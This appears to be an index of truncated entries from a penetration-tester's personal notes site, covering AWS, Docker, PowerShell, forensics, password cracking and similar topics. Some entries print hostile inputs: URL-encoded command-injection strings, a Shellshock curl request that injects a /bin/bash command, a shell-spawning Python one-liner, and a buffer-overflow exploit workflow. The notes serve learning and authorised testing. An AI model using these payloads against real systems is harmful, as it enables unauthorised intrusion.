-
Use profiles: See https://github.com/eon01/AWS-CheatSheet for many commands or https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/ General Get info about the currently used profile: aws [--profile $profile] sts get-caller-identity Another way to obtain an ARN (with account id) is to call a non-existing function and extract the data from the error message. EC2 List all EC2 images (AMIs): aws [--profile $profile] ec2…
-
This is how a PDF document with JavaScript execution looks. Note that with OpenAction 6 (object block 6) this block is executed when the document is opened. Another way to create a malicious PDF: Analyse a PDF file If a PDF file is compressed, decompress it first: pdftk input.pdf output output.pdf uncompress Get details with pdfinfo…
-
Configuration options env_reset: Resets the environment to the defaults configured in /etc/environment. env_keep: Adds environment variables which are additionally allowed. If LD_PRELOAD is in there, see below. mail_badpass: Sends an email to the admin if a user fails to provide the correct sudo password. secure_path: Sets the PATH environment variable to the given paths. Configurations Something like the following…
-
This post contains a collection of variable substitution commands. Bash $(echo id) Ruby #{} PHP {}
-
See also the encoding post for encoding methods. Tips Bypassing filters Linux / PHP All URL-encoded values start with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources
-
Older bash versions may execute code after function definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Caution: If the curl command fails, also try the reverse shell example in Burp! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…
-
Shellshock A function stored in an environment variable is executed in a child process of bash. When exporting a new function like this export func='() { echo mist; }; echo aha;' and starting a new bash session, "aha" is executed.
-
Local file inclusion and Wrappers General: If you try to read PHP and nothing is returned, have it returned base64-encoded! Remote file inclusion PHP deserialization If a program accepts a serialized object which uses a magic method, then… TODO, see here
-
Check also IDEs like IntelliJ, Visual Studio, Eclipse, …
-
See https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 as a base64 cheat sheet. The classic: base64 concatenates the bytes of the text, splits them into 6-bit groups (2^6 = 64) and maps each 6-bit group to a character. "==" means "two bytes missing". For example, if the combined bits have 2 bits "left" (41.…), the result ends in (A==) echo Hi | base64 -d Convert hex…
-
From SANS660: "Fuzzing is not an attack; it is a fault-testing technique." Types are: Instrumented Fuzzing: "Monitoring" a system to learn what normal inputs look like. No prior knowledge of the system needed. Intelligent Mutation: A protocol grammar which defines paths through all the code. Inputs are mutated according to the grammar. Tools https://tools.kali.org/vulnerability-analysis/sfuzz See https://en.kali.tools/all/?category=fuzzer Sulley…
-
Enumeration Multiple
-
GZ If the file cannot be extracted (gzip: log.gz: unexpected end of file), use zcat index.gz
-
Show tables .tables Show columns / schema from a table PRAGMA table_info(users)
-
General commands Show available Docker images docker images Show running Docker instances docker ps Run an instance in foreground (debug logs are visible) docker run -p 8080:80/tcp --name bolt11 aerth/boltcms:latest Run an instance in the background docker run -p 8000 --name <name> -d -t <imagename> Open shell into an instance docker exec -it <container_name> /bin/bash…
-
Fingerprintjs2 collects a vast amount of browser configuration data. Victims could be lured to visit a site which contains this JS, which sends the information back to the attacker. See OSCP 414ff
-
The Windows registry is a central data store for the operating system as well as for applications. It is a key-value store in a tree structure. A hive is a set of keys and their values. The root hives are: Short Long Content Source file HKCR HKEY_CLASSES_ROOT Information about file types and properties HKCC HKEY_CURRENT_CONFIG Information about…
-
Checklist A domain of a DC consists of the following elements: An object in AD may have a set of ACEs (Access Control Entries) which is called an ACL (Access Control List). An object's ACEs can be retrieved in PS with Get-ObjectAcl [-Identity] $object. The SCM (Service Control Manager) contains a database of installed services…
-
ext3/ext4 Design principles: Information about the file system General information fsstat /dev/sda1 Information of an inode (2 = root directory): istat /dev/sda1 2 Get the partitions of an image mmls server.img mmls shows the start offset of each partition. Show details of the partition which starts at 4096: fsstat -o 4096 server.img Show all files of a…
-
PowerShell Cmdlets consist of Verb-Method. To search for a method, type Get-Command New-U* To see all attributes of a Cmdlet, type Get-LocalUser | Get-Member To see specific or non-default attributes, type Get-LocalUser | Select-Object -Property Name,PasswordRequired Examples Directories and files Get all files in the current directory: Get-ChildItem Get all files in the current directory and below:…
-
Convert a Python2 script into a Python3 script: 2to3 -w example.py Fix tab/space/indentation problems: autopep8 -i linuxprivchecker.py If a library is installed but cannot be found (from smb.SMBConnection import SMBConnection), then try to search for the file locally and add the path manually: import sys; sys.path.append("path/to/your/file") One-liner for executing bash from a file: echo 'import os;os.system("/bin/bash")' > /tmp/e.py Execute something:…
-
On the client: root@raspberrypi:/etc/apt# cat apt.conf Acquire::http::Proxy "http://10.10.14.38:3128"; On the proxy:
-
Cross-compiling for 32/64 bit systems sudo apt-get install gcc-multilib gcc -m32 datei.c Tip: Add -static for a static binary. Note that you need to install the packages for the target platform, e.g. apt install gcc-i686-linux-gnu. Cross-compiling for Windows Install the packages with apt install gcc-mingw-w64. Then use x86_64-w64-mingw32-gcc execute.c -o execute.exe. Disable security features You can…
-
List with a ton of one-liner web servers in various languages HTTP python -m SimpleHTTPServer 8000 python3 -m http.server 8000 HTTPS ruby -r webrick/https -e ' WEBrick::HTTPServer.new( Port: 8000, DocumentRoot: ".", SSLEnable: true, SSLCertName: [%w[CN localhost]]).start'
-
(!) See also Password spraying to check an obtained password against usernames. Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly. Wordlist optimization If a password policy is known: Check password policy In Windows, type net accounts to get information about account locking, lockout thresholds etc. Cloud-based performance cracking See NPK Default passwords Hashcat Am…
-
Use bof1_web.py or bof1_socket.py to start. Use bof1_socket_10.py to determine the position of the EIP. Use bof2_socket_20.py with the found EIP offset to verify that the EIP was overwritten with B's. Use bof3_socket_10.py with the found EIP and find all bad chars. Find a JMP address with Mona. Create the payload, add it and profit. 0. Confirm vulnerability Download…
-
Note that iptables and ip6tables should always be used together! Tables Iptables manages a set of tables which act as ACLs (Access Control Lists). Actions Actions are defined via the -j option. Examples Show all rules: iptables -L; ip6tables -L Ignore all packets from a network: iptables -A INPUT -s 192.168.5.1/32 -j DROP; ip6tables -A INPUT -s fd75:943b:5f2e:0:a4:45a1:b753:4152 -j…
-
Start a screen session with a name: screen -S name List screen sessions: screen -ls Resume a screen session: screen -xS name